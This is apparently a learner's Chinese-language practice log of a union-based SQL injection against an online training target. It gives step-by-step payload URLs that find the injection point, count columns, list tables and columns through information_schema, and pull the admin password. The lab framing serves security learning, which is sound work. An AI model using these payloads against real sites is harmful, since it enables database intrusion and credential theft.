练习记录
靶场地址是网络上找的http://120.203.13.75:6815/?id=1
第一步:检查是否有注入点
?id =1 and 1=1 判断为真
?id =1 and 1=2 判断为假 (and理解为数学中且的含义)
第二步:查找字段
http://120.203.13.75:6815/?id=1 order by 1,2
(从1往上加,在2时页面没有出错,判断有两个字段)
第三步:获取数据库信息(数据库名)
version() (Php+mysql注入(5.0以上)) 次数版本为5.5.53
usr()
database() (主要)
尝试在id后使用其他整数代替(暂时意味不明)
http://120.203.13.75:6815/?id=3 union select 1,database()
查询"maoshe"下的 表名信息
http://120.203.13.75:6815/?id=3 union select 1,table_name from information_schema.tables where table_schema = “maoshe”
选取指定表名admin,获取列名信息:
http://120.203.13.75:6815/?id=4 union select 1,column_name from information_schema.columns where table_name=“admin” limit 2,1
利用limit语句获取列名信息
0,1 id
1,1 username
2,1 password
直接获取admin表名下的password列名的数据:
http://120.203.13.75:6815/?id=4 union select 1,password from maoshe.admin
得出结果 hellohack
借鉴:
https://blog.csdn.net/qq_40467699/article/details/79981965
https://blog.csdn.net/qq_36135278/article/details/81712677